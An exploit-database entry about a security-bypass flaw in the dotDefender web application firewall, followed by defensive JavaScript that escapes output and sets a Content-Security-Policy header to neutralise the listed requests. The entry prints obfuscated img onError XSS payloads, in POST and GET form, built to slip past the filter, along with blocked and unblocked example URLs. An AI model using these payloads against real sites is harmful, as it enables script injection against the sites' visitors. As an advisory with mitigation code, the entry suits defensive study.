dotDefender Security Bypass Vulnerability - exploit.company
vendor: dotDefender
by:
CVSS: 7.5 (HIGH)
Security Bypass
CWE: Bypass of Security Controls
Product Name: dotDefender
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

dotDefender Security Bypass Vulnerability

dotDefender fails to restrict malicious data from reaching protected sites, allowing remote attackers to bypass security restrictions and launch cross-site scripting attacks.

Mitigation:

Apply patches or updates provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41560/info

dotDefender is prone to a security-bypass vulnerability because it fails to restrict malicious data from reaching protected sites.

Remote attackers can exploit this issue to bypass security restrictions and to launch cross-site scripting attacks. 

<img src="WTF" onError="{var {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/.source)" /> //POST

<img src="WTF" onError="{var {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2Bh%2Bn)(/0wn3d/.source)" /> //GET

EXAMPLES:

Blocked:
http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5:a,0:v,4:n,1:e}=%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/.source%29%22%20/%3E

Unblocked:
http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
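Because the entry lists no patch, the protected application should not depend on the filter alone. The following is an added example, not code from the advisory or from dotDefender: it output-encodes the reflected `q` value so that both example requests above render as inert text whichever one the filter lets through. The `/search` handler, its template and all function names are assumptions.

```javascript
// Added example. The /search handler and template are hypothetical;
// the two URLs are the EXAMPLES listed in the advisory above.
const PAGE_EXAMPLES = [
  'http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5:a,0:v,4:n,1:e}=%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/.source%29%22%20/%3E',
  'http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E',
];

// Escape for HTML element content and quoted attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the results page. encode=false reproduces the vulnerable reflection.
function renderSearch(requestUrl, encode = true) {
  const q = new URL(requestUrl).searchParams.get('q') ?? '';
  const shown = encode ? escapeHtml(q) : q;
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      // Without 'unsafe-inline' the browser refuses inline handlers such as onerror.
      'Content-Security-Policy': "default-src 'self'; script-src 'self'",
    },
    body: `<h1>Results for ${shown}</h1>\n<input name="q" value="${shown}">`,
  };
}

// True when the body holds any start tag other than the template's own two.
function hasInjectedMarkup(body) {
  const tags = body.match(/<\s*[a-zA-Z][^>]*>/g) || [];
  return tags.some((t) => !/^<(h1|input name="q" value="[^"<>]*")>$/.test(t));
}

// Render each advisory URL both ways and report whether markup was injected.
function auditExamples() {
  return PAGE_EXAMPLES.map((url) => ({
    vulnerable: hasInjectedMarkup(renderSearch(url, false).body),
    hardened: hasInjectedMarkup(renderSearch(url).body),
  }));
}

console.log(auditExamples());
```

The Content-Security-Policy header is a second layer: if an encoding call is missed in some template, a policy without `'unsafe-inline'` still stops the `onError` attribute from executing.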